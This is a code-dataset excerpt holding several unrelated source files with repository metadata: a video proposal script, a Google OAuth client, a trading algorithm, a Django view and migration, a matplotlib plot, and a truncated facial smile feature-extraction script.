default='/nfs/bigbang/pratik18v/cse599/sst/data/c3d_pca/',
help='filepath for test dataset directory', type=str)
p.add_argument('-k', '--num_proposals', default=32,
help='Number of proposals generated at each timestep', type=int)
p.add_argument('-sl', '--seq_length', default=128,
help='Sequence length of each training instance', type=int)
p.add_argument('-dp', '--depth', default=1,
help='Number of recurrent layers in sequence encoder', type=int)
p.add_argument('-w', '--width', default=256,
help='Size of hidden state in each recurrent layer', type=int)
p.add_argument('-fd', '--feat-dim', default=500,
help='Dimension of c3d features', type=int)
p.add_argument('-drp', '--dropout', default=0.5,
help='Dropout probability', type=float)
p.add_argument('-v', '--verbose', default=False,
help='filename for output proposals', type=bool)
return p.parse_args()
def load_model(input_var=None, target_var=None, args=None, **kwargs):
model = SSTSequenceEncoder(input_var, target_var, seq_length=args.seq_length, depth=args.depth,
width=args.width, num_proposals=args.num_proposals, input_size=args.feat_dim, dropout=args.dropout,
mode='test')
return model
def main(args):
# build the model network and load with pre-trained parameters
input_var = T.tensor3('inputs')
sst_model = load_model(input_var=input_var, args=args)
sst_model.compile()
sst_model.load_model_params(args.model_params)
#Listing data files
fnames = []
video_ids = []
for fname in os.listdir(args.dataset):
if fname.split('_')[1] == 'test':
fnames.append(args.dataset + fname)
video_ids.append(fname.split('.')[0])
n_vid = len(video_ids)
proposals = [None] * n_vid
video_name = [None] * n_vid
for i, vid_name in enumerate(video_ids):
# process each video stream individually
data = sio.loadmat(fnames[i])
X_t = np.expand_dims(data['relu6'], axis=0)
# obtain proposals
y_pred = sst_model.forward_eval(X_t)
props_raw, scores_raw = get_segments(y_pred[0, :, :])
props, scores = nms_detections(props_raw, scores_raw, args.nms_thresh)
n_prop_after_pruning = scores.size
proposals[i] = np.hstack([
props, scores.reshape((-1, 1)),
np.zeros((n_prop_after_pruning, 1))])
video_name[i] = np.repeat([vid_name], n_prop_after_pruning).reshape(
n_prop_after_pruning, 1)
proposals_arr = np.vstack(proposals)
proposals_vid = np.vstack(video_name)
output_name = 'results_k{}.csv'.format(args.num_proposals)
output_file = os.path.join(args.output_dir, output_name)
df = pd.concat([
pd.DataFrame(proposals_arr, columns=['f-init', 'f-end', 'score',
'video-frames']),
pd.DataFrame(proposals_vid, columns=['video-name'])],
axis=1)
df.to_csv(output_file, index=None, sep=' ')
if args.verbose:
print('successful execution')
return 0
if __name__ == '__main__':
args = parse_args()
main(args)
| [
"pratik18v@gmail.com"
] | pratik18v@gmail.com |
7110b6154fe39eeffd7c02965d9e8c88a0b6f8ce | 2c084b3db7e5d27b0cce3fbf27a89b0de03bf552 | /liteauth/providers/google_oauth.py | a4d5ed04428af9c2ad185d08df600e8c3d04acb5 | [] | no_license | willkelly/liteauth | bd6c8f2a661414e4f91f2733e0545cd7a92c7026 | 9aebaf9ef472754492ea7df1a1c9b8904d39091d | refs/heads/master | 2021-01-22T06:28:41.812849 | 2014-03-13T11:17:06 | 2014-03-13T11:17:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,993 | py | from liteauth.providers.abstract_oauth import OauthClientInterface
from oauth import Client as OauthClient
class Client(OauthClientInterface):
PREFIX = 'g_'
def __init__(self, conf, redirect_url):
super(Client, self).__init__(redirect_url)
self.google_client_id = conf.get('google_client_id')
if not self.google_client_id:
raise ValueError('google_client_id not set in config file')
self.google_client_secret = conf.get('google_client_secret')
if not self.google_client_secret:
raise ValueError('google_client_secret not set in config file')
self.google_scope = conf.get('google_scope')
if not self.google_scope:
raise ValueError('google_scope not set in config file')
self.refresh_token = None
@classmethod
def create_for_redirect(cls, conf, redirect_url, state=None, approval_prompt='auto'):
gclient = cls(conf, redirect_url)
c = OauthClient(auth_endpoint='https://accounts.google.com/o/oauth2/auth',
client_id=gclient.google_client_id,
redirect_uri=gclient.redirect_url)
loc = c.auth_uri(scope=gclient.google_scope.split(','), access_type='offline',
state=state or '/', approval_prompt=approval_prompt)
gclient.redirect = loc
return gclient
@classmethod
def create_for_token(cls, conf, redirect_url, code):
gclient = cls(conf, redirect_url)
c = OauthClient(token_endpoint='https://accounts.google.com/o/oauth2/token',
resource_endpoint='https://www.googleapis.com/oauth2/v1',
redirect_uri=gclient.redirect_url,
client_id=gclient.google_client_id,
client_secret=gclient.google_client_secret)
c.request_token(code=code)
gclient.access_token = c.access_token
gclient.expires_in = c.expires_in
if hasattr(c, 'refresh_token'):
gclient.refresh_token = c.refresh_token
new_client = cls.create_for_refresh(conf, c.refresh_token)
gclient.access_token = new_client.access_token
gclient.expires_in = new_client.expires_in
gclient.userinfo = c.request('/userinfo')
return gclient
@classmethod
def create_for_refresh(cls, conf, redirect_url, rtoken):
gclient = cls(conf, redirect_url)
c = OauthClient(token_endpoint='https://accounts.google.com/o/oauth2/token',
resource_endpoint='https://www.googleapis.com/oauth2/v1',
client_id=gclient.google_client_id,
client_secret=gclient.google_client_secret)
error = c.request_token(grant_type='refresh_token',
refresh_token=rtoken)
if not error:
gclient.access_token = c.access_token
gclient.expires_in = c.expires_in
return gclient
| [
"constantine.peresypk@rackspace.com"
] | constantine.peresypk@rackspace.com |
085b458ef270d2c1acb8970e8d82e43ed77d7cf0 | 8b03dcd12a4a2a3856f2ec995b0d08a90ca3d6e2 | /LeveragedETFsWithSystematicRiskManagement.py | e9b8837f57b386ff0f44f40b8c138b1395f5db2d | [] | no_license | ZerounNet/StrategyLibraryQC | 1c1f13d2a7eadc96e0f223197e6d682cb521143f | b4fa0bfaab8ff650ee820cf807af36d267cf111f | refs/heads/main | 2023-07-12T23:55:36.063863 | 2021-08-18T21:46:41 | 2021-08-18T21:46:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | from EtfSmaAlphaModel import EtfSmaAlphaModel
class ParticleQuantumChamber(QCAlgorithm):
def Initialize(self):
self.SetStartDate(2015, 6, 15)
self.SetEndDate(2020, 6, 15)
self.SetCash(100000)
self.sso = Symbol.Create('SSO', SecurityType.Equity, Market.USA) # SSO = 2x levered SPX
self.shy = Symbol.Create('SHY', SecurityType.Equity, Market.USA) # SHY = short term Treasury ETF
self.SetWarmup(200)
self.SetBenchmark('SPY')
self.UniverseSettings.Resolution = Resolution.Hour
self.SetAlpha(EtfSmaAlphaModel(self.sso, self.shy))
self.SetUniverseSelection(ManualUniverseSelectionModel([self.sso, self.shy]))
self.SetExecution(ImmediateExecutionModel())
self.SetBrokerageModel(AlphaStreamsBrokerageModel())
self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel())
| [
"noreply@github.com"
] | ZerounNet.noreply@github.com |
ed93de707065f2b8a365587714ca37565801df90 | 6d395ffb748ac60733e9a5f039e2a307adae44d4 | /api/views_dir/xcx/page_group.py | ee7abc895b1e88940fd96cd77f904775668ab555 | [] | no_license | itcastpeng/hzWebSiteApi | 4f69c0f68dc78eebc4a5dad668d03e3c9d9c1d57 | f2bcd7a9ef28bf9c7f867e803f35d7b307d25527 | refs/heads/master | 2021-03-06T14:26:34.923464 | 2020-03-10T04:07:27 | 2020-03-10T04:07:27 | 246,204,894 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,787 | py |
from api import models
from publicFunc import Response
from publicFunc import account
from django.http import JsonResponse
from publicFunc.condition_com import conditionCom
from api.forms.xcx.page_group import SelectForm
import json
# @account.is_token(models.UserProfile)
def page_group(request):
response = Response.ResponseObj()
if request.method == "GET":
forms_obj = SelectForm(request.GET)
if forms_obj.is_valid():
current_page = forms_obj.cleaned_data['current_page']
length = forms_obj.cleaned_data['length']
print('forms_obj.cleaned_data -->', forms_obj.cleaned_data)
order = request.GET.get('order', '-create_datetime')
field_dict = {
'id': '',
'template_id': '',
'name': '__contains',
'create_datetime': '',
}
q = conditionCom(request, field_dict)
print('q -->', q)
objs = models.PageGroup.objects.filter(q).order_by(order)
count = objs.count()
if length != 0:
start_line = (current_page - 1) * length
stop_line = start_line + length
objs = objs[start_line: stop_line]
# 返回的数据
ret_data = []
default_page_id = None
for obj in objs:
# 获取分组下面的页面数据
page_objs = obj.page_set.all()
page_data = []
for page_obj in page_objs:
if not default_page_id:
default_page_id = page_obj.id
page_data.append({
'id': page_obj.id,
'name': page_obj.name
})
# 将查询出来的数据 加入列表
ret_data.append({
'id': obj.id,
'name': obj.name,
'page_data': page_data,
'create_datetime': obj.create_datetime.strftime('%Y-%m-%d %H:%M:%S'),
})
# 查询成功 返回200 状态码
response.code = 200
response.msg = '查询成功'
response.data = {
'ret_data': ret_data,
'data_count': count,
'default_page_id': default_page_id,
}
response.note = {
'id': "页面分组id",
'name': '页面分组名称',
'create_datetime': '创建时间',
}
else:
response.code = 402
response.msg = "请求异常"
response.data = json.loads(forms_obj.errors.as_json())
return JsonResponse(response.__dict__)
| [
"15531506906@sina.cn"
] | 15531506906@sina.cn |
6385ed69753166db4476df0c19a64026ba1ca806 | 5fc69312ad6f9a84ef6d7fcb0eb933fe0751f822 | /day01/code/page21.py | f4ab90720990a5eb5e38507da38e24519c8797eb | [] | no_license | zhangjili/ShuhuFenxi | c1973a27915069f46844de1336076e7aa5fb2f40 | 822bf8633e6ea2bea39c97194c2d683838f2a910 | refs/heads/master | 2020-07-30T00:39:11.640012 | 2019-09-21T16:43:42 | 2019-09-21T16:43:42 | 210,021,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,143 | py | # coding=utf-8
from matplotlib import pyplot as plt
import random
import matplotlib
from matplotlib import font_manager
# windws和linux设置字体的放
# font = {'family' : 'MicroSoft YaHei',
# 'weight': 'bold',
# 'size': 'larger'}
# matplotlib.rc("font",**font)
# matplotlib.rc("font",family='MicroSoft YaHei',weight="bold")
# 另外一种设置字体的方式
my_font = font_manager.FontProperties(fname="D:\\迅雷下载\\2-1Q22FT622\\罗西钢笔行楷.ttf")
x = range(0, 120)
y = [random.randint(20, 35) for i in range(120)]
plt.figure(figsize=(20, 8), dpi=80)
plt.plot(x, y)
# 调整x轴的刻度
_xtick_labels = ["10点{}分".format(i) for i in range(60)]
_xtick_labels += ["11点{}分".format(i) for i in range(60)]
# 取步长,数字和字符串一一对应,数据的长度一样
plt.xticks(list(x)[::3], _xtick_labels[::3], rotation=45, fontproperties=my_font) # rotaion旋转的度数
# 添加描述信息
plt.xlabel("时间", fontproperties=my_font)
plt.ylabel("温度 单位(℃)", fontproperties=my_font)
plt.title("10点到12点每分钟的气温变化情况", fontproperties=my_font)
plt.show()
| [
"guangchang@tom.com"
] | guangchang@tom.com |
f921dad333bc6888e2dfb4562a8301606217b4bc | 871f682f14509323c796919a238988dd5360d36e | /if_else/last_number_7.py | 70649431a102d07b442182db01ff3160c8c78d45 | [] | no_license | shreshta2000/If-else_questions_ | c59242ff07c626875f981a5c83a6287bdade24e3 | f30f2100d6328367a3db92ef7ebf39db7e5f0107 | refs/heads/master | 2022-12-02T16:01:01.552430 | 2020-08-20T14:40:34 | 2020-08-20T14:40:34 | 289,026,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | number=int(input("entre any number"))
if number%10==7:
print("last number is 7")
else:
print("last number is not 7") | [
"you@example.com"
] | you@example.com |
d58123b72969ccbd34331dda4d6b6903b5bede01 | b421b5422596d95626dffa920a4a55c841b1c6b9 | /spiderfarm/migrations/0002_zonefragment_imported.py | 70a5968323caa4a39d6e0cb0381a7f41c793cef3 | [] | no_license | mr-brick/spiderfarm-crm | 42a87c12e00f9c9c9de23411132ba9e308018529 | 687ea73d469c7b43be8956b67de14003cc8290a4 | refs/heads/master | 2022-04-06T00:08:31.261125 | 2020-03-05T10:14:43 | 2020-03-05T10:14:43 | 239,498,995 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | # Generated by Django 2.2.3 on 2019-08-09 02:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('spiderfarm', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='zonefragment',
name='imported',
field=models.BooleanField(default=False, verbose_name='Imported'),
),
]
| [
"mrbrick1101@protonmail.com"
] | mrbrick1101@protonmail.com |
13b02b7cda7bdacf889392ac7824c6f6921a9691 | 4c77d7bf064b035e095b969e535aa95aad4d877e | /demo/features_extraction.py | 3faf17f68ba7399c50fea3ea24b449bb0b21be0c | [] | no_license | emavgl/discriminate-posed-spontaneous-smile | c0633fb4051196db83e2c331dc7866d66c04024e | de2d2ec0d3cb47b65228e0bf58f1500503903121 | refs/heads/master | 2021-07-06T12:07:21.797197 | 2017-09-29T22:31:34 | 2017-09-29T22:31:34 | 105,322,275 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,353 | py | from PIL import Image, ImageDraw
import numpy as np
import sys, traceback
import os, glob, math
import re
import copy
import csv
from scipy.signal import medfilt
import operator
'''
features_extractions.py
input: folder with frontalized images and landmarks (.lm) file for each image
What it does:
Takes all the images inside the input directory and, for each image, gets the landmarks.
Using the landmarks, the script extracts the dlip and eyelid
using the formulas in the paper "Recognition of Genuine Smiles".
Then, it divides the functions (frame, dlip) and (frame, eyelid)
in temporal phases: onset, apex, offset and extracts the lip features (25)
and eye features (25).
'''
### HELPER FUNCTIONS
def atoi(text):
return int(text) if text.isdigit() else text
def safe_div(x, y):
if y==0: return 0
return x/y
def natural_keys(text):
'''
alist.sort(key=natural_keys) sorts in human order
http://nedbatchelder.com/blog/200712/human_sorting.html
(See Toothy's implementation in the comments)
'''
return [ atoi(c) for c in re.split('(\d+)', text) ]
def getMiddlePoint(p1, p2):
"""
returns the middle point between p1 and p2
"""
x1, y1 = p1
x2, y2 = p2
return (round(float((x1 + x2)/2), 2), round(float((y1 + y2)/2), 2))
def distance(p1, p2):
"""
Input: two points (x, y), (x2, y2)
Output: (float) Euclidean distance
"""
x1, y1 = p1
x2, y2 = p2
base = math.pow(x1-x2, 2) + math.pow(y1-y2, 2)
return math.sqrt(base)
def segmentize(xs, ys):
"""
Divide the function in segments
input:
- xs is the array with all the x values of the function
- ys is the array with the y values of the functions
In our case; ys are the amplitudes, xs are the frames
output: amplitudes (list), speeds (list)
"""
points = list(zip(xs, ys))
list_1 = points[:-1]
list_2 = points[1:]
amplitudes = []
speeds = []
# iterate over cuples of points
for point1, point2 in zip(list_1, list_2):
x1, y1 = point1
x2, y2 = point2
speed = float((y2 - y1))*fps
amplitudes.append(y2 - y1)
speeds.append(speed)
return amplitudes, speeds
def division_kmeans(amplitudes):
"""
Divide the function (frame, amplitudes) in temporal phases
using the kmeans algorithm.
"""
from sklearn.cluster import KMeans
from sklearn import preprocessing
f1 = range(1, len(amplitudes) + 1) # (x) frames
f2 = amplitudes # (y) amplitudes
X = np.matrix(list(zip(f1,f2)))
standardized_X = preprocessing.scale(X)
# since I want the distance of frames to be
# more relevant than the second features (amplitudes)
# I have to multiply, a weight, say 2, the second features
standardized_X[:,0] *= 1.4
standardized_X[:,1] *= 1
kmeans = KMeans(n_clusters=3, max_iter=500).fit(X)
return kmeans.labels_.tolist()
def eyeLidAmplitude(p1, p2, upper_middle):
"""
Calculate the eyelid amplitude
formula: distance(lower_middle, upper_middle)*vertical_location_function
"""
lower_middle = getMiddlePoint(p1, p2)
x_upper_middle, y_upper_middle = upper_middle
x_lower_middle, y_lower_middle = lower_middle
vertical_location_function = 1
# Check if the upper_middle stays below the lower_middle
# if so, set the vertical_location_function to -1
if y_upper_middle > y_lower_middle: vertical_location_function = -1
return distance(lower_middle, upper_middle)*vertical_location_function
def extractPoints(landmarks_file_path):
"""
input: path of the file with landmarks
landmark file should have two rows, the first with "x" coordinates
the second with the "y".
output: This function create the landmark point and get only the points
described in the paper.
"""
x_co = None
y_co = None
try:
with open(landmarks_file_path, "r") as fo:
x_co = (fo.readline()).split(" ")
y_co = (fo.readline()).split(" ")
except:
print("Error: no lm file", landmarks_file_path)
exit(-1)
# parse to int
x_co = [int(i) for i in x_co[:-1]]
y_co = [int(i) for i in y_co[:-1]]
indexes_to_get = [36, 37, 38, 39, 42, 43, 44, 45, 30, 48, 54, 8, 62]
points = []
for i in indexes_to_get:
points.append((x_co[i], y_co[i]))
return [(0, 0), points[0], getMiddlePoint(points[1], points[2]), points[3], points[4],
getMiddlePoint(points[5], points[6]), points[7], (0, 0), (0, 0),
points[8], points[9], points[10], points[11], points[12]]
def checkMax(li):
"""
Check if the list is empty.
If the list is empty, returns 0
"""
if len(li) > 0:
return max(li)
return 0
def checkMean(li):
"""
Check if the list is empty.
If the list is empty, returns 0
"""
if len(li) > 0:
return np.mean(li)
return 0
# Definition of the functions
# - find_longest_positive_sequence
# - find_longest_negative_sequence
# This function are useful to divide the function in temporal segments
# The onset is the phase that starts from 0 and ends
# with the last frame of the longest positive sequence of segments
def find_longest_positive_sequence(arr, limit):
"""
returns the start frame and the last frame of
the longest sequence of consecutive positive segments
A limit is specified because we want to choose only
the sequence of positive segments that starts before
the start of the longest sequence of negative segments
"""
sequences = []
sequence = 0
indexes = []
first_index = None
last_index = None
for i, element in enumerate(arr):
if element > 0 and i < limit:
if first_index == None: first_index = i
sequence += 1
elif sequence > 0:
last_index = i
sequences.append(sequence)
indexes.append((first_index, last_index))
sequence = 0
first_index = None
max_sequence = max(sequences)
max_index = sequences.index(max_sequence)
return indexes[max_index]
def find_longest_negative_sequence(arr):
"""
returns the start frame and the last frame of
the longest sequence of consecutive negative segments
"""
sequences = []
sequence = 0
indexes = []
first_index = None
last_index = None
for i, element in enumerate(arr):
# if element < 0 and i > limit:
if element < 0:
if first_index == None: first_index = i
sequence += 1
elif sequence > 0:
last_index = i
sequences.append(sequence)
indexes.append((first_index, last_index))
sequence = 0
first_index = None
max_sequence = max(sequences)
max_index = sequences.index(max_sequence)
return indexes[max_index]
def extractFeatures(amplitudes, speeds, left_amplitude, right_amplitude):
"""
input:
- amplitudes: list of segments amplitude (dlip2 - dlip1) from segmatization
- speeds: list of speeds
- left_amplitude: list of left_amplitude values
- right_amplitude: a list of right_amplitude values
Extracts 25 features described in the paper and writes
4 CSV (one per temporal phase + one for all the phases together)
"""
# Get the ascending_segments and descending segments
# if the value of the segment is positive, is ascending
ascending_segments, descending_segments = [i for i in amplitudes if i > 0 ], [j for j in amplitudes if j < 0]
# Divides into ascending speeds and descending speeds
speeds_asc, speeds_des = [i for i in speeds if i > 0 ], [j for j in speeds if j < 0]
# Get the absolute values of the descending speeds
speeds_des_abs = [abs(number) for number in speeds_des]
# Get the absolute values of the descending segments
descending_segments_abs = [abs(number) for number in descending_segments]
# Gets the number of ascending and descending segments
nascending = len(ascending_segments)
ndescending = len(descending_segments)
ntotal = nascending + ndescending
# Gets the sum of ascending values and abs(descending) values
sum_ascending = sum(ascending_segments)
sum_descending = sum(descending_segments_abs)
### Duration ###
# Description: duration of the ascendent, descendent, both phases
# Formula: number_of_frames / frame_rate
# since each segment is composed of two frames
# the number of frames is n_segments*2
# Output: duration = [duration+, duration-, duration_tot]
################
durationP = float(nascending*2)/fps
durationN = float(ndescending*2)/fps
durationT = float(ntotal*2)/fps
duration = [durationP, durationN, durationT]
### DurationRatio ###
# Description: how many positive frames respect all the frames
# Formula: number_of_segments_in_phase / number_of_all_segments
# since each segment is composed of two frames
# the number of frames is n_segments*2
# but the *2 at the numerator and *2 at denominator
# cancel out.
# Output: durationRatio
#####################
durationRatioP = float(nascending)/ntotal
durationRatioN = float(ndescending)/ntotal
durationRatio = [durationRatioP, durationRatioN]
### max (value of a segment)
# Description: max value of a segment
# Formula: max(amplitudes)
# Output: maximum
####################
maximum = checkMax(amplitudes)
### mean
# Description: max value of a segment
# Formula: mean(amplitudes)
# Output: mean
####################
meanA = checkMean(amplitudes)
meanP = checkMean(ascending_segments)
meanD = checkMean(descending_segments_abs)
mean = [meanA, meanP, meanD]
### Standard Deviation
# Description: standard deviation of the amplitude values
# Formula: standard deviation, use grade of freedom = 1
# Output: std
#####################
std = np.std(amplitudes, ddof=1)
### Total Amplitude
# Description: sum of the amplitude of the ascending and descending segments
# Formula: /
# Output: total_amplitude[sumD+, sumD-]
####################
total_amplitude = [sum_ascending, sum_descending]
### Net Amplitude
# Description: difference of ascending's amplitude and descending's
# Formula: sumD+ - sumD-
# Output: total_amplitude[sumD+, sumD-]
####################
net_amplitude = sum_ascending - sum_descending
### Amplitude Ratio
# Description: difference of ascending's amplitude and descending's
# Formula: sumD+ / sum_ascending + sum_descending and viceversa
# Output: total_amplitude[sumD+, sumD-]
####################
amplitude_ratio_asc = safe_div(sum_ascending, sum_ascending + sum_descending)
amplitude_ratio_des = safe_div(sum_descending, sum_ascending + sum_descending)
amplitude_ratio = [amplitude_ratio_asc, amplitude_ratio_des]
### Max speed
# Description: get max speed
# Formula: get both asc and desc speeds (abs), get the max
# Output: max_speed
###################
max_speed = [checkMax(speeds_asc), checkMax(speeds_des_abs)]
### Mean speed
# Description: get mean speed
# Formula: sum_of_speeds_asc / len(speeds_asc)
# Output: mean_speed
####################
mean_speed = [checkMean(speeds_asc), checkMean(speeds_des_abs)]
### Maximum Acceleration
# How to calc acceleration, we have "speeds" that contains the speeds
# of the segments, speeds[0] is the speed of the movement from dlip(0) and dlip(1).
# So we use the acceleration formula is acceleration = v2 - v1 / t
# We have to divide the acceleration into acceleration of D+ and D-
# and we have two different interpretations of this:
# - put inside acceleration_asc all the positive acceleration and viceversa
# - acceleration_asc will contain the acceleration, both positive and negative
# of the ascending temporal phase, relativlely to ascending segments in that
# temporal phase.
# We chose this last one interpretation. How to identifies if a segment
# is ascending or descending using the speed values? to do this, it is
# necessary to check the sings of v2 and v1.
# if both are positive, D+
# if both are negative, D-
# if v2+ and v1- D+
# if v2- and v1+, D-
# we can compress the rules, checking only the sign of v2
# t is in seconds, and, since we have 50 fps, t = 1 / 50
acceleration_asc = []
acceleration_des = []
list_1 = speeds[:-1]
list_2 = speeds[1:]
for v1, v2 in zip(list_1, list_2):
acc = v2 - v1
if v2 >= 0:
acceleration_asc.append(acc)
else:
acceleration_des.append(acc)
max_acceleration = [checkMax(acceleration_asc), checkMax(acceleration_des)]
### Mean Acceleration
# Description: mean between acceleration values (all acceleration are positive)
# Formula: np.mean
# Output: mean_acceleration
###########################
mean_acceleration = [checkMean(acceleration_asc), checkMean(acceleration_des)]
### Net. Amplitude Duration Ratio
# Description: mean between acceleration values (all acceleration are positive)
# Formula: (sum D+ - sum |D-|) * fps / len(D)
# Output: Amplitude Duration Ratio
###########################
net_amplitude_ratio = ((sum_ascending - sum_descending)*fps)/ ntotal
### Left/Right Amplitude Difference
# Description: /
# Formula: abs(sum(left_amplitude) - sum(right_amplitude)) / ntotal
# Output: left_right_amplitude_diff
###########################
left_right_amplitude_diff = abs(sum(left_amplitude) - sum(right_amplitude)) / ntotal
# Aggregate all features in a single list (25 features in total)
features_set = [durationP, durationN, durationT, durationRatioP, durationRatioN,
maximum, meanA, meanP, meanD, std, sum_ascending, sum_descending,
net_amplitude, amplitude_ratio_asc, amplitude_ratio_des,
checkMax(speeds_asc), checkMax(speeds_des_abs), checkMean(speeds_asc), checkMean(speeds_des_abs),
checkMax(acceleration_asc), checkMax(acceleration_des), checkMean(acceleration_asc),
checkMean(acceleration_des), net_amplitude_ratio, left_right_amplitude_diff]
return features_set
def writeCSV(features, features_name, input_folder):
"""
Write CSV with a single line that represent the set of features
of a particular folder (video)
"""
foldername = input_folder.split('/')[-2]
output_file = '{}{}.{}.csv'.format(input_folder, foldername, features_name)
with open(output_file, "w") as f:
writer = csv.writer(f)
writer.writerow(features)
def extractDlipFeaturesFromFolder(input_folder):
"""
Extract lip landmarks, and use them to calculate the dlip value
aftr we have the function (frame, dlip), it first calls the
segmatize functions and then extract featurs function.
At the end, it writes the extracted value into CSV files.
"""
# get the list of all the landmarks files
search_model = input_folder + "*.lm"
file_list = glob.glob(search_model)
# sort file_list in natural order
file_list.sort(key=natural_keys)
# extract points from the first frame
first_frame = input_folder + "frame0.jpg.lm"
landmarks = extractPoints(first_frame)
f_central_point = landmarks[13]
f_l10 = landmarks[10]
f_l11 = landmarks[11]
# for each file in the list, extract l10, l11
# and central point of the month
# calculate dlip and save it in a list "amplitudes"
amplitudes = []
left_amplitudes = []
right_amplitudes = []
for f in file_list:
landmarks = extractPoints(f)
central_point = landmarks[13]
l10 = landmarks[10]
l11 = landmarks[11]
right_amplitude = distance(f_central_point, l10)
left_amplitude = distance(f_central_point, l11)
dlip = right_amplitude + left_amplitude
dlip = float(dlip) / (2*distance(f_l10, f_l11))
amplitudes.append(dlip)
left_amplitudes.append(left_amplitude)
right_amplitudes.append(right_amplitude)
# apply smoothing median filter
amplitudes = medfilt(amplitudes, 5)
left_amplitudes = medfilt(left_amplitudes, 5)
right_amplitudes = medfilt(right_amplitudes, 5)
# segmatize
seg_amplitudes, speed = segmentize(range(len(amplitudes)), amplitudes)
# Read from file and find the division algorithm to use
algorithm_to_use = 'paper'
tries = 0
while True:
# NOTE: you could insert a try-catch here, but this part is not problematic
try:
if 'paper' == algorithm_to_use:
# Method 1 - Paper like
max_negative_sequence = find_longest_negative_sequence(seg_amplitudes)
limit = max_negative_sequence[0]
max_positive_sequence = find_longest_positive_sequence(seg_amplitudes, limit)
onset_indexes = (0, max_positive_sequence[1])
offset_indexes = (max_negative_sequence[0], len(seg_amplitudes) + 1)
onset_frames = range(onset_indexes[0], onset_indexes[1])
offset_frames = range(offset_indexes[0], offset_indexes[1])
onset_index = 0
apex_index = 1
offset_index = 2
# fill "labels" list with the corresponding index for each frame
labels = []
for i in range(len(amplitudes)):
if i in onset_frames:
labels.append(onset_index)
elif i in offset_frames:
labels.append(offset_index)
else:
labels.append(apex_index)
clusters = [[], [], []]
xs = [[], [], []]
cluster_left_amplitudes = [[], [], []]
cluster_right_amplitudes = [[], [], []]
for i, l in enumerate(labels):
clusters[l].append(amplitudes[i])
cluster_left_amplitudes[l].append(left_amplitudes[i])
cluster_right_amplitudes[l].append(right_amplitudes[i])
xs[l].append(i)
else:
# Method 2: cluster based
labels = division_kmeans(amplitudes)
onset_index = labels[0]
offset_index = labels[-1]
apex_index = 3 - (onset_index + offset_index)
# get index of the last green element
last_green = list(filter(lambda x: x[1] == offset_index, enumerate(labels)))[0]
# fix incorrect blue point in other sections
labels = [ (labels[x[0]-1] if x[0] < last_green[0] and x[1] == offset_index else x[1]) for x in enumerate(labels) ]
clusters = [[], [], []]
xs = [[], [], []]
cluster_left_amplitudes = [[], [], []]
cluster_right_amplitudes = [[], [], []]
for i, l in enumerate(labels):
clusters[l].append(amplitudes[i])
cluster_left_amplitudes[l].append(left_amplitudes[i])
cluster_right_amplitudes[l].append(right_amplitudes[i])
xs[l].append(i)
except Exception as e:
if tries > 0:
raise Exception('It is the second time that something went wrong with ' + input_folder)
print('There was an error here' + input_folder)
print(e)
# try with a different division algorithm
algorithm_to_use = 'cluster' if algorithm_to_use == 'paper' else 'paper'
tries += 1
continue
# Here we have the division in phases
# Now it's time to run the extractions
# NOTE: This step could raise an error
# For example, if the phase division is not so good
# You could force to use another method for the classification instead
try:
amplitudes_onset, speed_onset = segmentize(xs[onset_index], clusters[onset_index])
amplitudes_apex, speed_apex = segmentize(xs[apex_index], clusters[apex_index])
amplitudes_offset, speed_offset = segmentize(xs[offset_index], clusters[offset_index])
left_amplitude_onset, _ = segmentize(xs[onset_index], cluster_left_amplitudes[onset_index])
right_amplitude_onset, _ = segmentize(xs[onset_index], cluster_right_amplitudes[onset_index])
left_amplitude_apex, _ = segmentize(xs[apex_index], cluster_left_amplitudes[apex_index])
right_amplitude_apex, _ = segmentize(xs[apex_index], cluster_right_amplitudes[apex_index])
left_amplitude_offset, _ = segmentize(xs[offset_index], cluster_left_amplitudes[offset_index])
right_amplitude_offset, _ = segmentize(xs[offset_index], cluster_right_amplitudes[offset_index])
onsetFeatures = extractFeatures(amplitudes_onset, speed_onset, left_amplitude_onset, right_amplitude_onset)
apexFeatures = extractFeatures(amplitudes_apex, speed_apex, left_amplitude_apex, right_amplitude_apex)
offsetFeatures = extractFeatures(amplitudes_offset, speed_offset, left_amplitude_offset, right_amplitude_offset)
totalFeaturesSet = onsetFeatures + apexFeatures + offsetFeatures
# writeCSV(totalFeaturesSet, 'lip_total', input_folder)
return labels, totalFeaturesSet
except Exception as e:
if tries > 0:
raise Exception('It is the second time that something went wrong with ' + input_folder)
print('There was an error here' + input_folder)
print(e)
# try with a different division algorithm
algorithm_to_use = 'cluster' if algorithm_to_use == 'paper' else 'paper'
tries += 1
def extractEyeLidFeaturesFromFolder(input_folder, labels):
"""
Extract Eyelid Features given an input folder with landmarks
"""
# get the list of all the landmarks files
search_model = input_folder + "*.lm"
file_list = glob.glob(search_model)
# sort file_list in natural order
file_list.sort(key=natural_keys)
# for each file in the list, extract l1, l2, l3, l4, l5
# calculate EyeLid and save it in a list "amplitudes"
amplitudes = []
left_amplitudes = []
right_amplitudes = []
for f in file_list:
landmarks = extractPoints(f)
l1 = landmarks[1]
l2 = landmarks[2]
l3 = landmarks[3]
l4 = landmarks[4]
l5 = landmarks[5]
l6 = landmarks[6]
# Calculate deyelid
left_amplitude = eyeLidAmplitude(l1, l3, l2)
right_amplitude = eyeLidAmplitude(l4, l6, l5)
dyeyelid = (left_amplitude + right_amplitude) / (2*distance(l1, l3))
amplitudes.append(dyeyelid)
left_amplitudes.append(left_amplitude)
right_amplitudes.append(right_amplitude)
# We already have "labels" that defines where frames are located
clusters = [[], [], []]
xs = [[], [], []]
cluster_left_amplitudes = [[], [], []]
cluster_right_amplitudes = [[], [], []]
for i, l in enumerate(labels):
clusters[l].append(amplitudes[i])
cluster_left_amplitudes[l].append(left_amplitudes[i])
cluster_right_amplitudes[l].append(right_amplitudes[i])
xs[l].append(i)
# still a valid way to compute the indexes for both
# longest sequence and kmeans algorithms
onset_index = labels[0]
offset_index = labels[-1]
apex_index = 3 - (onset_index + offset_index)
# Also this block can raise an error, but better that it doesn't
